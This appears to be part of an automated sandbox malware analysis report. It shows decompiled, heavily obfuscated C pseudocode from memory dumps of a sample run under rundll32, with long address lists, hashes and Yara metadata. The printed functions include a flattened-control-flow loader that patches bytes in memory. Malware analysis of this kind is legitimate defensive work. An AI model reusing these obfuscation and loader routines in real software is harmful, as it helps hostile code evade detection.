				_v644 = _v644 ^ 0x94defa20;
				_v644 = _v644 << 1;
				_v644 = _v644 ^ 0x293db944;
				_v652 = 0xb70b59;
				_v652 = _v652 << 0xb;
				_v652 = _v652 + 0xffff8138;
				_t189 = 0x15;
				_v652 = _v652 / _t189;
				_v652 = _v652 ^ 0x08c5a62f;
				_v616 = 0xf4782f;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 + 0xffff066a;
				_v616 = _v616 ^ 0xfff8c7bc;
				_v604 = 0x656560;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x0000606f;
				_v648 = 0x377d9b;
				_t190 = 0x7f;
				_v648 = _v648 / _t190;
				_v648 = _v648 + 0xfd7f;
				_v648 = _v648 + 0xffff6b0a;
				_v648 = _v648 ^ 0x00006649;
				_v636 = 0x80cedd;
				_t191 = 0x58;
				_v636 = _v636 / _t191;
				_v636 = _v636 + 0x515e;
				_v636 = _v636 ^ 0x000b92de;
				_v620 = 0x65d9bd;
				_v620 = _v620 + 0xffff4b50;
				_v620 = _v620 ^ 0xd34cfccc;
				_v620 = _v620 ^ 0xd32e4bd2;
				_v632 = 0xb89e86;
				_v632 = _v632 + 0xffffcc79;
				_t192 = 0x2f;
				_v632 = _v632 / _t192;
				_v632 = _v632 ^ 0x00046a67;
				_v628 = 0xbb1c4a;
				_v628 = _v628 >> 6;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x000a4ee8;
				_v640 = 0xfd7114;
				_v640 = _v640 << 5;
				_v640 = _v640 * 0x45;
				_v640 = _v640 + 0xa2ea;
				_v640 = _v640 ^ 0x89e0c310;
				_v612 = 0x26e293;
				_v612 = _v612 >> 0xd;
				_v612 = _v612 ^ 0x00050986;
				_t193 = _v612;
				do {
					while(_t162 != 0x249e110) {
						if(_t162 == 0x48c9d54) {
							_v556 = 0x22c;
							_t153 = E0034C15D(_t193, _v652, _v616,  &_v556, _v604);
							_t196 =  &(_t196[3]);
							asm("sbb ecx, ecx");
							_t167 =  ~_t153 & 0xf758a92f;
							L13:
							_t162 = _t167 + 0xe63f1a5;
							continue;
						}
						if(_t162 == 0x5bc9ad4) {
							_t156 = E00338E4D( &_v556,  &_v600);
							asm("sbb ecx, ecx");
							_t167 =  ~_t156 & 0xf3e5ef6b;
							goto L13;
						}
						if(_t162 == 0xac58df2) {
							_v576 = _t187;
							_t162 = 0xcf1a497;
							continue;
						}
						if(_t162 != 0xcf1a497) {
							if(_t162 == 0xe63f1a5) {
								return E00341E67(_v632, _v628, _v640, _v612, _t193);
							}
							goto L18;
						}
						_push(_t162);
						_t156 = E00335988(_t162, _v608);
						_t193 = _t156;
						if(_t156 != 0xffffffff) {
							_t162 = 0x48c9d54;
							continue;
						}
						L8:
						return _t156;
					}
					_t151 = E00332A58(_v648, _t193,  &_v556, _v636, _v620);
					_t196 =  &(_t196[3]);
					if(_t151 == 0) {
						_t162 = 0xe63f1a5;
						goto L18;
					} else {
						_t162 = 0x5bc9ad4;
						continue;
					}
					goto L8;
					L18:
				} while (_t162 != 0xad68edc);
				return _t156;
			}

































                                                                                                                    0x0033e2d6
                                                                                                                    0x0033e2dd
                                                                                                                    0x0033e2e4
                                                                                                                    0x0033e2e5
                                                                                                                    0x0033e2ea
                                                                                                                    0x0033e2ec
                                                                                                                    0x0033e2f1
                                                                                                                    0x0033e2f9
                                                                                                                    0x0033e2fc
                                                                                                                    0x0033e306
                                                                                                                    0x0033e30e
                                                                                                                    0x0033e313
                                                                                                                    0x0033e31b
                                                                                                                    0x0033e322
                                                                                                                    0x0033e325
                                                                                                                    0x0033e331
                                                                                                                    0x0033e335
                                                                                                                    0x0033e33d
                                                                                                                    0x0033e345
                                                                                                                    0x0033e34d
                                                                                                                    0x0033e355
                                                                                                                    0x0033e359
                                                                                                                    0x0033e361
                                                                                                                    0x0033e369
                                                                                                                    0x0033e36e
                                                                                                                    0x0033e37a
                                                                                                                    0x0033e37f
                                                                                                                    0x0033e385
                                                                                                                    0x0033e38d
                                                                                                                    0x0033e395
                                                                                                                    0x0033e39a
                                                                                                                    0x0033e3a2
                                                                                                                    0x0033e3aa
                                                                                                                    0x0033e3b2
                                                                                                                    0x0033e3b7
                                                                                                                    0x0033e3bf
                                                                                                                    0x0033e3cb
                                                                                                                    0x0033e3d0
                                                                                                                    0x0033e3d6
                                                                                                                    0x0033e3de
                                                                                                                    0x0033e3e6
                                                                                                                    0x0033e3ee
                                                                                                                    0x0033e3fa
                                                                                                                    0x0033e3ff
                                                                                                                    0x0033e405
                                                                                                                    0x0033e40d
                                                                                                                    0x0033e415
                                                                                                                    0x0033e41d
                                                                                                                    0x0033e425
                                                                                                                    0x0033e42d
                                                                                                                    0x0033e435
                                                                                                                    0x0033e43d
                                                                                                                    0x0033e449
                                                                                                                    0x0033e44c
                                                                                                                    0x0033e450
                                                                                                                    0x0033e458
                                                                                                                    0x0033e460
                                                                                                                    0x0033e46a
                                                                                                                    0x0033e474
                                                                                                                    0x0033e47c
                                                                                                                    0x0033e484
                                                                                                                    0x0033e48e
                                                                                                                    0x0033e492
                                                                                                                    0x0033e49a
                                                                                                                    0x0033e4a2
                                                                                                                    0x0033e4aa
                                                                                                                    0x0033e4af
                                                                                                                    0x0033e4b7
                                                                                                                    0x0033e4bb
                                                                                                                    0x0033e4bb
                                                                                                                    0x0033e4c9
                                                                                                                    0x0033e56a
                                                                                                                    0x0033e57d
                                                                                                                    0x0033e582
                                                                                                                    0x0033e589
                                                                                                                    0x0033e58b
                                                                                                                    0x0033e55b
                                                                                                                    0x0033e55b
                                                                                                                    0x00000000
                                                                                                                    0x0033e55b
                                                                                                                    0x0033e4d5
                                                                                                                    0x0033e54a
                                                                                                                    0x0033e553
                                                                                                                    0x0033e555
                                                                                                                    0x00000000
                                                                                                                    0x0033e555
                                                                                                                    0x0033e4dd
                                                                                                                    0x0033e532
                                                                                                                    0x0033e536
                                                                                                                    0x00000000
                                                                                                                    0x0033e536
                                                                                                                    0x0033e4e5
                                                                                                                    0x0033e4e9
                                                                                                                    0x00000000
                                                                                                                    0x0033e505
                                                                                                                    0x00000000
                                                                                                                    0x0033e4e9
                                                                                                                    0x0033e51b
                                                                                                                    0x0033e520
                                                                                                                    0x0033e525
                                                                                                                    0x0033e52c
                                                                                                                    0x0033e52e
                                                                                                                    0x00000000
                                                                                                                    0x0033e52e
                                                                                                                    0x0033e512
                                                                                                                    0x0033e512
                                                                                                                    0x0033e512
                                                                                                                    0x0033e5a6
                                                                                                                    0x0033e5ab
                                                                                                                    0x0033e5b0
                                                                                                                    0x0033e5bc
                                                                                                                    0x00000000
                                                                                                                    0x0033e5b2
                                                                                                                    0x0033e5b2
                                                                                                                    0x00000000
                                                                                                                    0x0033e5b2
                                                                                                                    0x00000000
                                                                                                                    0x0033e5be
                                                                                                                    0x0033e5be
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                    • API String ID: 0-3572798563
                                                                                                                    • Opcode ID: 84ff12e26efdb68cf03f03849009ad08719321799c73013c5df2b8f256c0be86
                                                                                                                    • Instruction ID: 04efce24e3e1b9f84c399c2abe68ee4c4a16203eaa30530acbcc8eed8f3ef9a2
                                                                                                                    • Opcode Fuzzy Hash: 84ff12e26efdb68cf03f03849009ad08719321799c73013c5df2b8f256c0be86
                                                                                                                    • Instruction Fuzzy Hash: 8D717572508301DFD359CF22C88985FBBE1EBC4768F504A1DF5969A2A0D775CA49CF82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                      • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                    • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                      • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                    • String ID: LOC
                                                                                                                    • API String ID: 3864805678-519433814
                                                                                                                    • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                    • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                    • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                    • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033CF47 Relevance: 7.9, Strings: 6, Instructions: 380COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E0033CF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v88;
				char* _v92;
				char _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* _t345;
				void* _t377;
				void* _t378;
				void* _t386;
				void* _t393;
				intOrPtr _t403;
				intOrPtr* _t406;
				void* _t408;
				signed char* _t414;
				signed char* _t450;
				intOrPtr* _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				void* _t458;
				signed char* _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				void* _t470;
				void* _t471;
				void* _t474;

				_t406 = _a8;
				_t456 = _a4;
				_push(_a20);
				_t455 = _a16;
				_push(_t455);
				_push(_a12);
				_push(_t406);
				_push(_t456);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t345);
				_v256 = 0xcf1dac;
				_t471 = _t470 + 0x1c;
				_v256 = _v256 ^ 0x662b1d0f;
				_v256 = _v256 << 2;
				_t408 = 0x8e80a37;
				_v256 = _v256 + 0xffff9089;
				_v256 = _v256 ^ 0x9b8f9315;
				_v160 = 0x25617a;
				_v160 = _v160 << 2;
				_v160 = _v160 ^ 0x009585a8;
				_v264 = 0x39e017;
				_v264 = _v264 + 0xffffbc9c;
				_v264 = _v264 ^ 0xb11c7ead;
				_v264 = _v264 + 0xffffd7b2;
				_v264 = _v264 ^ 0xb125b990;
				_v240 = 0xb82586;
				_t460 = 0x74;
				_v240 = _v240 / _t460;
				_v240 = _v240 << 1;
				_t461 = 0x3b;
				_v132 = _v132 & 0x00000000;
				_v240 = _v240 * 0x36;
				_v240 = _v240 ^ 0x00aace1a;
				_v180 = 0xcab8fe;
				_v180 = _v180 ^ 0xca9451c5;
				_v180 = _v180 | 0x3e03c42f;
				_v180 = _v180 ^ 0xfe5c53ad;
				_v248 = 0x57862;
				_v248 = _v248 | 0x3f7dcfba;
				_v248 = _v248 / _t461;
				_t462 = 0x62;
				_v248 = _v248 / _t462;
				_v248 = _v248 ^ 0x00057d9a;
				_v252 = 0x68f561;
				_v252 = _v252 << 6;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 | 0x3cddc102;
				_v252 = _v252 ^ 0x3cda88f2;
				_v192 = 0x7c8e99;
				_v192 = _v192 + 0x829c;
				_v192 = _v192 * 0x31;
				_v192 = _v192 ^ 0x17fda794;
				_v228 = 0x74d91a;
				_v228 = _v228 << 3;
				_v228 = _v228 + 0x7502;
				_v228 = _v228 * 0x63;
				_v228 = _v228 ^ 0x69a7ce60;
				_v208 = 0xc909ae;
				_v208 = _v208 << 1;
				_t463 = 0xb;
				_v208 = _v208 / _t463;
				_v208 = _v208 ^ 0x00276772;
				_v164 = 0x673800;
				_v164 = _v164 << 9;
				_v164 = _v164 ^ 0xce7e8a93;
				_v232 = 0xb859bd;
				_v232 = _v232 + 0xde76;
				_t464 = 0x5b;
				_v232 = _v232 * 0x1c;
				_v232 = _v232 * 0x30;
				_v232 = _v232 ^ 0xcc63b0a7;
				_v172 = 0x7eda56;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0x03f50911;
				_v184 = 0x2f7891;
				_v184 = _v184 / _t464;
				_t465 = 0x41;
				_v184 = _v184 * 0x49;
				_v184 = _v184 ^ 0x0024fbf7;
				_v148 = 0x4a0bea;
				_v148 = _v148 ^ 0x502016f1;
				_v148 = _v148 ^ 0x506ad42a;
				_v260 = 0x9ebd58;
				_v260 = _v260 >> 8;
				_v260 = _v260 << 0xf;
				_v260 = _v260 + 0xb306;
				_v260 = _v260 ^ 0x4f54a3e8;
				_v204 = 0xce3506;
				_v204 = _v204 << 0xf;
				_v204 = _v204 << 0xc;
				_v204 = _v204 ^ 0x300ddb73;
				_v244 = 0xe7c592;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x506a7775;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0xa0d2afa7;
				_v268 = 0x1d8a79;
				_v268 = _v268 << 2;
				_v268 = _v268 / _t465;
				_v268 = _v268 | 0x253986a4;
				_v268 = _v268 ^ 0x2531568a;
				_v216 = 0x116531;
				_t466 = 0x61;
				_v216 = _v216 * 0x66;
				_v216 = _v216 ^ 0xfffdc9ed;
				_v216 = _v216 ^ 0xf917010b;
				_v200 = 0xc05f9c;
				_v200 = _v200 / _t466;
				_v200 = _v200 * 0x6f;
				_v200 = _v200 ^ 0x00dca3d1;
				_v212 = 0xdb89ea;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 >> 9;
				_v212 = _v212 ^ 0x0000ad8d;
				_v152 = 0x38fb70;
				_v152 = _v152 ^ 0x310cc67b;
				_v152 = _v152 ^ 0x313af23a;
				_v136 = 0x7e2008;
				_v136 = _v136 ^ 0x7ad3030b;
				_v136 = _v136 ^ 0x7aaaa86e;
				_v196 = 0x9c4278;
				_t467 = 0x4e;
				_v196 = _v196 * 0x7e;
				_v196 = _v196 ^ 0xa26962db;
				_v196 = _v196 ^ 0xee89d9da;
				_v220 = 0x1e88f4;
				_v220 = _v220 >> 4;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000c14cc;
				_v140 = 0xc2e6ba;
				_v140 = _v140 + 0x8875;
				_v140 = _v140 ^ 0x00c43ba1;
				_v188 = 0xdb74c;
				_v188 = _v188 << 4;
				_v188 = _v188 * 0x5c;
				_v188 = _v188 ^ 0x4edda20a;
				_v236 = 0x62ea5;
				_v236 = _v236 / _t467;
				_v236 = _v236 >> 0xb;
				_v236 = _v236 ^ 0x7372adb3;
				_v236 = _v236 ^ 0x73757ff2;
				_v144 = 0x2b6271;
				_v144 = _v144 ^ 0x1ac7dce1;
				_v144 = _v144 ^ 0x1ae73668;
				_v224 = 0x8bb898;
				_v224 = _v224 + 0x43a9;
				_v224 = _v224 << 0x10;
				_t468 = 0x71;
				_t469 = _v132;
				_v224 = _v224 / _t468;
				_v224 = _v224 ^ 0x023712cd;
				_v156 = 0xb23c07;
				_v156 = _v156 + 0x4ded;
				_v156 = _v156 ^ 0x00b7ca1c;
				_v168 = 0xb501ce;
				_v168 = _v168 ^ 0x6706c67f;
				_v168 = _v168 ^ 0x67b3c7a1;
				_v176 = 0xab8984;
				_v176 = _v176 * 0x22;
				_v176 = _v176 ^ 0x16c84308;
				goto L1;
				do {
					while(1) {
						L1:
						_t474 = _t408 - 0xd9acfaa;
						if(_t474 > 0) {
							break;
						}
						if(_t474 == 0) {
							E00348519(_v236, _v144, _v128);
							_t408 = 0xfbb751f;
							continue;
						}
						if(_t408 == 0x15a913b) {
							_v40 = _t456;
							_v92 =  &_v32;
							_v56 =  *_t455;
							_v52 =  *((intOrPtr*)(_t455 + 4));
							_v88 = 0x20;
							_t393 = E00337735(_v192,  &_v112,  &_v120, _v228, _v208);
							_t471 = _t471 + 0x10;
							if(_t393 == 0) {
								L20:
								return _v132;
							}
							_t408 = 0xf0a856e;
							continue;
						}
						if(_t408 == 0x3749e66) {
							_t469 = E00340AE0(_v176, _v168);
							_t408 = 0x46acfc9;
							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
							continue;
						}
						if(_t408 == 0x46acfc9) {
							_push(_t408);
							_push(_t408);
							_t403 = E00337FF2( *((intOrPtr*)(_t406 + 4)));
							 *_t406 = _t403;
							if(_t403 == 0) {
								_t408 = 0xd9acfaa;
							} else {
								_v132 = 1;
								_t408 = 0xfb3baa2;
							}
							continue;
						}
						if(_t408 != 0x8e80a37) {
							goto L31;
						}
						_t408 = 0xfac38db;
					}
					if(_t408 == 0xf0a856e) {
						_t377 = E003370B3(_v164,  &_v128,  &_v120, _v232, _v172);
						_t471 = _t471 + 0xc;
						if(_t377 == 0) {
							_t408 = 0xfbb751f;
							goto L31;
						}
						_t408 = 0x3749e66;
						goto L1;
					}
					if(_t408 == 0xfac38db) {
						_push( *_t455);
						_t378 = E0034AE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
						_t471 = _t471 + 0x14;
						if(_t378 == 0) {
							goto L20;
						}
						_t408 = 0x15a913b;
						goto L1;
					}
					if(_t408 == 0xfb3baa2) {
						_t457 =  *_t406;
						E00337E87(_v268, _v216, _v200, _t457);
						_t458 = _t457 + _v264;
						E0033ED7E(_v212, _t458, _v152, _v128, _v124);
						_t459 = _t458 + _v124;
						E0033A492(_v196, _v220, _t459, _t469);
						_t450 =  &(_t459[_t469]);
						_t471 = _t471 + 0x20;
						_t414 = _t459;
						if(_t459 >= _t450) {
							L25:
							_t386 = E00340AE0(0xe, 0);
							_t408 = 0xd9acfaa;
							 *((char*)(_t386 + _t459)) = 0;
							_t456 = _a4;
							goto L1;
						} else {
							goto L22;
						}
						do {
							L22:
							if(( *_t414 & 0x000000ff) == _v256) {
								 *_t414 = 0xc3;
							}
							_t414 =  &(_t414[1]);
						} while (_t414 < _t450);
						goto L25;
					}
					if(_t408 != 0xfbb751f) {
						goto L31;
					}
					E00348519(_v224, _v156, _v120);
					goto L20;
					L31:
				} while (_t408 != 0x5927677);
				goto L20;
			}












































































                                                                                                                    0x0033cf4e
                                                                                                                    0x0033cf57
                                                                                                                    0x0033cf5f
                                                                                                                    0x0033cf66
                                                                                                                    0x0033cf6d
                                                                                                                    0x0033cf6e
                                                                                                                    0x0033cf75
                                                                                                                    0x0033cf76
                                                                                                                    0x0033cf77
                                                                                                                    0x0033cf78
                                                                                                                    0x0033cf79
                                                                                                                    0x0033cf7e
                                                                                                                    0x0033cf86
                                                                                                                    0x0033cf89
                                                                                                                    0x0033cf93
                                                                                                                    0x0033cf98
                                                                                                                    0x0033cf9d
                                                                                                                    0x0033cfa5
                                                                                                                    0x0033cfad
                                                                                                                    0x0033cfb8
                                                                                                                    0x0033cfc0
                                                                                                                    0x0033cfcb
                                                                                                                    0x0033cfd3
                                                                                                                    0x0033cfdb
                                                                                                                    0x0033cfe3
                                                                                                                    0x0033cfeb
                                                                                                                    0x0033cff3
                                                                                                                    0x0033d001
                                                                                                                    0x0033d006
                                                                                                                    0x0033d00c
                                                                                                                    0x0033d015
                                                                                                                    0x0033d018
                                                                                                                    0x0033d020
                                                                                                                    0x0033d024
                                                                                                                    0x0033d02c
                                                                                                                    0x0033d034
                                                                                                                    0x0033d03c
                                                                                                                    0x0033d044
                                                                                                                    0x0033d04c
                                                                                                                    0x0033d054
                                                                                                                    0x0033d064
                                                                                                                    0x0033d06c
                                                                                                                    0x0033d06f
                                                                                                                    0x0033d073
                                                                                                                    0x0033d07b
                                                                                                                    0x0033d083
                                                                                                                    0x0033d088
                                                                                                                    0x0033d08d
                                                                                                                    0x0033d095
                                                                                                                    0x0033d09d
                                                                                                                    0x0033d0a5
                                                                                                                    0x0033d0b2
                                                                                                                    0x0033d0b6
                                                                                                                    0x0033d0be
                                                                                                                    0x0033d0c6
                                                                                                                    0x0033d0cb
                                                                                                                    0x0033d0d8
                                                                                                                    0x0033d0dc
                                                                                                                    0x0033d0e4
                                                                                                                    0x0033d0ec
                                                                                                                    0x0033d0f8
                                                                                                                    0x0033d0fd
                                                                                                                    0x0033d103
                                                                                                                    0x0033d10b
                                                                                                                    0x0033d116
                                                                                                                    0x0033d11e
                                                                                                                    0x0033d129
                                                                                                                    0x0033d131
                                                                                                                    0x0033d13e
                                                                                                                    0x0033d141
                                                                                                                    0x0033d14a
                                                                                                                    0x0033d14e
                                                                                                                    0x0033d156
                                                                                                                    0x0033d15e
                                                                                                                    0x0033d163
                                                                                                                    0x0033d16b
                                                                                                                    0x0033d17b
                                                                                                                    0x0033d184
                                                                                                                    0x0033d187
                                                                                                                    0x0033d18b
                                                                                                                    0x0033d193
                                                                                                                    0x0033d19e
                                                                                                                    0x0033d1a9
                                                                                                                    0x0033d1b4
                                                                                                                    0x0033d1bc
                                                                                                                    0x0033d1c1
                                                                                                                    0x0033d1c6
                                                                                                                    0x0033d1ce
                                                                                                                    0x0033d1d6
                                                                                                                    0x0033d1de
                                                                                                                    0x0033d1e3
                                                                                                                    0x0033d1e8
                                                                                                                    0x0033d1f0
                                                                                                                    0x0033d1f8
                                                                                                                    0x0033d1fd
                                                                                                                    0x0033d205
                                                                                                                    0x0033d209
                                                                                                                    0x0033d211
                                                                                                                    0x0033d219
                                                                                                                    0x0033d226
                                                                                                                    0x0033d22a
                                                                                                                    0x0033d232
                                                                                                                    0x0033d23a
                                                                                                                    0x0033d247
                                                                                                                    0x0033d248
                                                                                                                    0x0033d24c
                                                                                                                    0x0033d254
                                                                                                                    0x0033d25c
                                                                                                                    0x0033d26a
                                                                                                                    0x0033d273
                                                                                                                    0x0033d277
                                                                                                                    0x0033d27f
                                                                                                                    0x0033d287
                                                                                                                    0x0033d28c
                                                                                                                    0x0033d291
                                                                                                                    0x0033d299
                                                                                                                    0x0033d2a4
                                                                                                                    0x0033d2af
                                                                                                                    0x0033d2ba
                                                                                                                    0x0033d2c5
                                                                                                                    0x0033d2d0
                                                                                                                    0x0033d2db
                                                                                                                    0x0033d2ec
                                                                                                                    0x0033d2ef
                                                                                                                    0x0033d2f3
                                                                                                                    0x0033d2fb
                                                                                                                    0x0033d303
                                                                                                                    0x0033d30b
                                                                                                                    0x0033d310
                                                                                                                    0x0033d315
                                                                                                                    0x0033d31d
                                                                                                                    0x0033d328
                                                                                                                    0x0033d333
                                                                                                                    0x0033d33e
                                                                                                                    0x0033d346
                                                                                                                    0x0033d350
                                                                                                                    0x0033d354
                                                                                                                    0x0033d35c
                                                                                                                    0x0033d36c
                                                                                                                    0x0033d370
                                                                                                                    0x0033d375
                                                                                                                    0x0033d37d
                                                                                                                    0x0033d385
                                                                                                                    0x0033d390
                                                                                                                    0x0033d39b
                                                                                                                    0x0033d3a6
                                                                                                                    0x0033d3ae
                                                                                                                    0x0033d3b6
                                                                                                                    0x0033d3bf
                                                                                                                    0x0033d3c2
                                                                                                                    0x0033d3c9
                                                                                                                    0x0033d3cd
                                                                                                                    0x0033d3d5
                                                                                                                    0x0033d3e0
                                                                                                                    0x0033d3eb
                                                                                                                    0x0033d3f6
                                                                                                                    0x0033d3fe
                                                                                                                    0x0033d406
                                                                                                                    0x0033d40e
                                                                                                                    0x0033d41b
                                                                                                                    0x0033d41f
                                                                                                                    0x0033d41f
                                                                                                                    0x0033d427
                                                                                                                    0x0033d427
                                                                                                                    0x0033d427
                                                                                                                    0x0033d427
                                                                                                                    0x0033d42d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033d433
                                                                                                                    0x0033d553
                                                                                                                    0x0033d559
                                                                                                                    0x00000000
                                                                                                                    0x0033d559
                                                                                                                    0x0033d43f
                                                                                                                    0x0033d4e3
                                                                                                                    0x0033d4f6
                                                                                                                    0x0033d4ff
                                                                                                                    0x0033d509
                                                                                                                    0x0033d51f
                                                                                                                    0x0033d52b
                                                                                                                    0x0033d530
                                                                                                                    0x0033d535
                                                                                                                    0x0033d5a7
                                                                                                                    0x0033d5b8
                                                                                                                    0x0033d5b8
                                                                                                                    0x0033d537
                                                                                                                    0x00000000
                                                                                                                    0x0033d537
                                                                                                                    0x0033d44b
                                                                                                                    0x0033d4b7
                                                                                                                    0x0033d4cb
                                                                                                                    0x0033d4d0
                                                                                                                    0x00000000
                                                                                                                    0x0033d4d0
                                                                                                                    0x0033d453
                                                                                                                    0x0033d477
                                                                                                                    0x0033d478
                                                                                                                    0x0033d479
                                                                                                                    0x0033d47e
                                                                                                                    0x0033d484
                                                                                                                    0x0033d498
                                                                                                                    0x0033d486
                                                                                                                    0x0033d486
                                                                                                                    0x0033d491
                                                                                                                    0x0033d491
                                                                                                                    0x00000000
                                                                                                                    0x0033d484
                                                                                                                    0x0033d45b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033d461
                                                                                                                    0x0033d461
                                                                                                                    0x0033d569
                                                                                                                    0x0033d6ac
                                                                                                                    0x0033d6b1
                                                                                                                    0x0033d6b6
                                                                                                                    0x0033d6c2
                                                                                                                    0x00000000
                                                                                                                    0x0033d6c2
                                                                                                                    0x0033d6b8
                                                                                                                    0x00000000
                                                                                                                    0x0033d6b8
                                                                                                                    0x0033d575
                                                                                                                    0x0033d65b
                                                                                                                    0x0033d674
                                                                                                                    0x0033d679
                                                                                                                    0x0033d67e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033d684
                                                                                                                    0x00000000
                                                                                                                    0x0033d684
                                                                                                                    0x0033d581
                                                                                                                    0x0033d5b9
                                                                                                                    0x0033d5c8
                                                                                                                    0x0033d5d1
                                                                                                                    0x0033d5ee
                                                                                                                    0x0033d5f3
                                                                                                                    0x0033d60e
                                                                                                                    0x0033d613
                                                                                                                    0x0033d616
                                                                                                                    0x0033d619
                                                                                                                    0x0033d61d
                                                                                                                    0x0033d630
                                                                                                                    0x0033d63f
                                                                                                                    0x0033d646
                                                                                                                    0x0033d64b
                                                                                                                    0x0033d64f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033d61f
                                                                                                                    0x0033d61f
                                                                                                                    0x0033d626
                                                                                                                    0x0033d628
                                                                                                                    0x0033d628
                                                                                                                    0x0033d62b
                                                                                                                    0x0033d62c
                                                                                                                    0x00000000
                                                                                                                    0x0033d61f
                                                                                                                    0x0033d589
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033d5a1
                                                                                                                    0x00000000
                                                                                                                    0x0033d6c7
                                                                                                                    0x0033d6c7
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
